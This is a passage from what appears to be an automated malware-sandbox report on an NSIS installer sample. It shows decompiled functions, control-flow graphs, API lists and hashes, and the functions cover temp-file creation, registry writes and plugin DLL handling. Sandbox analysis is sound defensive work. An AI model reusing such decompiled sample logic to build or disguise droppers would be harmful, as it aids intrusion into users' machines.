                                                                                      0x7103170c

                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,710322D8,?,00000808), ref: 710316D5
                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,710322D8,?,00000808), ref: 710316DC
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,710322D8,?,00000808), ref: 710316F0
                                                                                      • GetProcAddress.KERNEL32(710322D8,00000000), ref: 710316F7
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 71031700
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 1148316912-0
                                                                                      • Opcode ID: a7e203e1b8ceb8050c43063ab687b2bb4f6e20ddcd1cd7d73e2f8269e14c075e
                                                                                      • Instruction ID: 35b11402b8999a8108906bd7c8d0e657a09f6ecc34aeff372dd2f50c4f0c3e40
                                                                                      • Opcode Fuzzy Hash: a7e203e1b8ceb8050c43063ab687b2bb4f6e20ddcd1cd7d73e2f8269e14c075e
                                                                                      • Instruction Fuzzy Hash: C1F0AC7320A1387FD62116A78C4CD9BBE9CDF8B2F5B210615F628D619086765D01D7F1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 71031817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 928 71031817-71031856 call 71031bff 932 71031976-71031978 928->932 933 7103185c-71031860 928->933 934 71031862-71031868 call 7103243e 933->934 935 71031869-71031876 call 71032480 933->935 934->935 940 710318a6-710318ad 935->940 941 71031878-7103187d 935->941 942 710318af-710318cb call 71032655 call 71031654 call 71031312 GlobalFree 940->942 943 710318cd-710318d1 940->943 944 71031898-7103189b 941->944 945 7103187f-71031880 941->945 965 71031925-71031929 942->965 949 710318d3-7103191c call 71031666 call 71032655 943->949 950 7103191e-71031924 call 71032655 943->950 944->940 951 7103189d-7103189e call 71032e23 944->951 947 71031882-71031883 945->947 948 71031888-71031889 call 71032b98 945->948 953 71031890-71031896 call 71032810 947->953 954 71031885-71031886 947->954 961 7103188e 948->961 949->965 950->965 964 710318a3 951->964 969 710318a5 953->969 954->940 954->948 961->964 964->969 970 71031966-7103196d 965->970 971 7103192b-71031939 call 71032618 965->971 969->940 970->932 976 7103196f-71031970 GlobalFree 970->976 978 71031951-71031958 971->978 979 7103193b-7103193e 971->979 976->932 978->970 981 7103195a-71031965 call 710315dd 978->981 979->978 980 71031940-71031948 979->980 980->978 982 7103194a-7103194b FreeLibrary 980->982 981->970 982->978
                                                                                      C-Code - Quality: 88%
                                                                                      			E71031817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7103506c = _a8;
				 *0x71035070 = _a16;
				 *0x71035074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x71035048, E71031651);
				_push(1); // executed
				_t37 = E71031BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E7103243E(_t54);
					}
					_push(_t54);
					E71032480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E71032655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E71031666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E71032655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E71032655();
							_t37 = GlobalFree(E71031312(E71031654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E71032618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E710315DD( *0x71035068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E71032E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E71032B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E71032810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                                                      0x71031817
                                                                                      0x71031817
                                                                                      0x71031817
                                                                                      0x71031824
                                                                                      0x7103182c
                                                                                      0x71031839
                                                                                      0x71031847
                                                                                      0x7103184a
                                                                                      0x7103184c
                                                                                      0x71031851
                                                                                      0x71031856
                                                                                      0x71031978
                                                                                      0x71031978
                                                                                      0x7103185c
                                                                                      0x71031860
                                                                                      0x71031863
                                                                                      0x71031868
                                                                                      0x71031869
                                                                                      0x7103186a
                                                                                      0x71031870
                                                                                      0x71031876
                                                                                      0x710318a6
                                                                                      0x710318ad
                                                                                      0x710318d1
                                                                                      0x7103191e
                                                                                      0x7103191f
                                                                                      0x710318d3
                                                                                      0x710318d3
                                                                                      0x710318d4
                                                                                      0x710318dd
                                                                                      0x710318de
                                                                                      0x710318e8
                                                                                      0x710318eb
                                                                                      0x710318f0
                                                                                      0x710318f7
                                                                                      0x710318f7
                                                                                      0x710318fd
                                                                                      0x710318fe
                                                                                      0x71031904
                                                                                      0x7103190a
                                                                                      0x71031917
                                                                                      0x71031918
                                                                                      0x7103191b
                                                                                      0x710318af
                                                                                      0x710318af
                                                                                      0x710318b0
                                                                                      0x710318c5
                                                                                      0x710318c5
                                                                                      0x71031929
                                                                                      0x7103192c
                                                                                      0x71031939
                                                                                      0x71031940
                                                                                      0x71031948
                                                                                      0x7103194b
                                                                                      0x7103194b
                                                                                      0x71031948
                                                                                      0x71031958
                                                                                      0x71031960
                                                                                      0x71031965
                                                                                      0x71031958
                                                                                      0x7103196d
                                                                                      0x00000000
                                                                                      0x7103196f
                                                                                      0x00000000
                                                                                      0x71031970
                                                                                      0x7103196d
                                                                                      0x7103187a
                                                                                      0x7103187d
                                                                                      0x7103189b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103189e
                                                                                      0x710318a3
                                                                                      0x710318a3
                                                                                      0x710318a5
                                                                                      0x00000000
                                                                                      0x710318a5
                                                                                      0x7103187f
                                                                                      0x71031880
                                                                                      0x71031888
                                                                                      0x71031889
                                                                                      0x00000000
                                                                                      0x71031889
                                                                                      0x71031882
                                                                                      0x71031883
                                                                                      0x71031891
                                                                                      0x00000000
                                                                                      0x71031891
                                                                                      0x71031886
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031886

                                                                                      APIs
                                                                                        • Part of subcall function 71031BFF: GlobalFree.KERNEL32(?), ref: 71031E74
                                                                                        • Part of subcall function 71031BFF: GlobalFree.KERNEL32(?), ref: 71031E79
                                                                                        • Part of subcall function 71031BFF: GlobalFree.KERNEL32(?), ref: 71031E7E
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 710318C5
                                                                                      • FreeLibrary.KERNEL32(?), ref: 7103194B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 71031970
                                                                                        • Part of subcall function 7103243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7103246F
                                                                                        • Part of subcall function 71032810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,71031896,00000000), ref: 710328E0
                                                                                        • Part of subcall function 71031666: wsprintfW.USER32 ref: 71031694
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3962662361-3916222277
                                                                                      • Opcode ID: 702410d26f3b6d217afb69df6619860b7f93875fb220154247f6bf6a567c3ef8
                                                                                      • Instruction ID: 3062133095fd7dbdc0a4302704b0593ef2f1df06e17e7b4e00efef40d9336839
                                                                                      • Opcode Fuzzy Hash: 702410d26f3b6d217afb69df6619860b7f93875fb220154247f6bf6a567c3ef8
                                                                                      • Instruction Fuzzy Hash: FC41D372900206ABDB019F70DC88B997BFDBF8DB10F9444AEFA469E086DB75D084C760
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 985 40248a-4024bb call 402da6 * 2 call 402e36 992 4024c1-4024cb 985->992 993 402c2a-402c39 985->993 995 4024cd-4024da call 402da6 lstrlenW 992->995 996 4024de-4024e1 992->996 995->996 999 4024e3-4024f4 call 402d84 996->999 1000 4024f5-4024f8 996->1000 999->1000 1001 402509-40251d RegSetValueExW 1000->1001 1002 4024fa-402504 call 4032b4 1000->1002 1006 402522-402603 RegCloseKey 1001->1006 1007 40251f 1001->1007 1002->1001 1006->993 1007->1006
                                                                                      C-Code - Quality: 83%
                                                                                      			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5f0 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800); // executed
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
				return 0;
			}













                                                                                      0x0040248a
                                                                                      0x0040248a
                                                                                      0x0040248a
                                                                                      0x0040248a
                                                                                      0x0040248d
                                                                                      0x00402494
                                                                                      0x0040249e
                                                                                      0x004024a1
                                                                                      0x004024aa
                                                                                      0x004024b1
                                                                                      0x004024b8
                                                                                      0x004024bb
                                                                                      0x004024c1
                                                                                      0x004024cb
                                                                                      0x004024cf
                                                                                      0x004024da
                                                                                      0x004024da
                                                                                      0x004024e1
                                                                                      0x004024eb
                                                                                      0x004024f1
                                                                                      0x004024f4
                                                                                      0x004024f4
                                                                                      0x004024f8
                                                                                      0x00402504
                                                                                      0x00402504
                                                                                      0x00402515
                                                                                      0x0040251d
                                                                                      0x0040251f
                                                                                      0x0040251f
                                                                                      0x00402522
                                                                                      0x004025fd
                                                                                      0x004025fd
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso9723.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso9723.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso9723.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nso9723.tmp
                                                                                      • API String ID: 2655323295-2708458960
                                                                                      • Opcode ID: 5fa3ae97acee3c86253f1ec4314ed064f915dff64d639275cc1e961bbdf348f5
                                                                                      • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                                                      • Opcode Fuzzy Hash: 5fa3ae97acee3c86253f1ec4314ed064f915dff64d639275cc1e961bbdf348f5
                                                                                      • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405F14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 53%
                                                                                      			E00405F14(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653D(0x42fa70, _a4);
				_t21 = E00405EB7(0x42fa70);
				if(_t21 != 0) {
					E004067C4(_t21);
					if(( *0x434f18 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa70 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa70);
							_push(0x42fa70);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406873();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E58(0x42fa70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E0C();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                                                      0x00405f20
                                                                                      0x00405f2b
                                                                                      0x00405f2f
                                                                                      0x00405f36
                                                                                      0x00405f42
                                                                                      0x00405f52
                                                                                      0x00405f54
                                                                                      0x00405f6c
                                                                                      0x00405f6d
                                                                                      0x00405f74
                                                                                      0x00405f75
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405f58
                                                                                      0x00405f5f
                                                                                      0x00405f67
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405f5f
                                                                                      0x00405f77
                                                                                      0x00405f7d
                                                                                      0x00000000
                                                                                      0x00405f8b
                                                                                      0x00405f44
                                                                                      0x00405f4a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405f4a
                                                                                      0x00405f31
                                                                                      0x00000000

                                                                                      APIs
                                                                                        • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\,?,00405F2B,C:\,C:\,75A43420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75A43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                      • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,75A43420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75A43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                      • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,75A43420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75A43420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 3248276644-2214159804
                                                                                      • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                      • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                                      • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                      • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                      0x00406062
                                                                                      0x00406068
                                                                                      0x00406069
                                                                                      0x00406069
                                                                                      0x0040606e
                                                                                      0x0040606f
                                                                                      0x00406072
                                                                                      0x00406077
                                                                                      0x0040607a
                                                                                      0x00406084
                                                                                      0x00406091
                                                                                      0x00406095
                                                                                      0x0040609d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004060a1
                                                                                      0x00000000
                                                                                      0x004060a3
                                                                                      0x004060a3
                                                                                      0x004060a3
                                                                                      0x004060a6
                                                                                      0x004060a9
                                                                                      0x004060a9
                                                                                      0x004060ac
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 0040607A
                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-944333549
                                                                                      • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                      • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                                      • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                      • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 90%
                                                                                      			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                      0x00406419
                                                                                      0x0040641b
                                                                                      0x00406433
                                                                                      0x00406438
                                                                                      0x0040643d
                                                                                      0x0040647b
                                                                                      0x0040647b
                                                                                      0x0040643f
                                                                                      0x00406451
                                                                                      0x0040645c
                                                                                      0x00406462
                                                                                      0x0040646d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040646d
                                                                                      0x00406481

                                                                                      APIs
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                                      • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll), ref: 0040645C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
